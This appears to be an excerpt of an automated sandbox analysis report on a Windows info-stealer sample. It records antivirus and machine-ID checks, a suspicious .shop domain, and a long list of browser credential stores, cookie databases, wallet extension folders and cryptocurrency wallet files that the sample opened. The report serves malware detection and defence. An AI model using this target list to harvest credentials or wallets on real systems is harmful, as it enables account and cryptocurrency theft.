Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: resergvearyinitiani.shop
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2170910908.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206649428.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2209302108.0000000003750000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208131381.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: Jaxx Liberty
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: window-state.json
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: Wallets/Ethereum
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\Application Data\Mozilla\Firefox
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\CZQKSDDMWR
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\HMPPSXQPQV
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\WSHEJMDVQC
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\CZQKSDDMWR
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\WSHEJMDVQC
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\WSHEJMDVQC
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\HMPPSXQPQV
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\WSHEJMDVQC
